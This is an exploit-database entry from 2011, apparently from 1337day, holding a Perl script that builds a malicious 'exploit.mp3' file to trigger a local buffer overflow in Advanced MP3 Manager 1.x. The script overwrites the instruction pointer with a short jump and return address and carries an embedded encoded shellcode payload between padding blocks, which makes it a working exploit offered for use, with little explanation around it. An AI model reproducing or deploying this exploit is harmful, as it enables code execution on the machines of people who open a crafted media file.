Advanced MP3 Manager 1.x Local Buffer Overflow



EKU-ID: 1189 CVE: OSVDB-ID:
Author: Angel Injection Published: 2011-10-25 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


#!/usr/bin/perl

                          ||          ||   | ||      
                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_,
                  ( :   /    (_)    /           (   .

# Title: Advanced MP3 Manager 1.x Local Buffer Overflow #
# Date: 24/10/2011 #
# submited In http://1337day.com #

##########################################################################
#1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0#
#0     _                   __           __       __                     1#
#1   /' \            __  /'__`\        /\ \__  /'__`\                   0#
#0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1#
#1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0#
#0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1#
#1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0#
#0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1#
#1                  \ \____/ >> Exploit database separated by exploit   0#
#0                   \/___/          type (local, remote, DoS, etc.)    1#
#1                                                                      1#
#0  [+] Site            : 1337day.com                                   0#
#1  [+] Support e-mail  : submit[at]1337day.com                         1#
#0                                                                      0#
#1               #########################################              1#
#0               I'm Angel Injection member from Inj3ct0r Team          1#
#1               #########################################              0#
#0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1#
##########################################################################
my $file= "exploit.mp3";
my $junk= "\x41" x  640;
my $junk1= "\x42" x 100000;
 
my $nsh="\xEB\x05\x90\x90";
my $eip1 = pack('V', 0x21003762);
 
my $shell =
"\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";
 
open($FILE, ">$file");
print($FILE $junk.$nsh.$eip1.$shell.$junk1);
close($FILE);
print("exploit created successfully");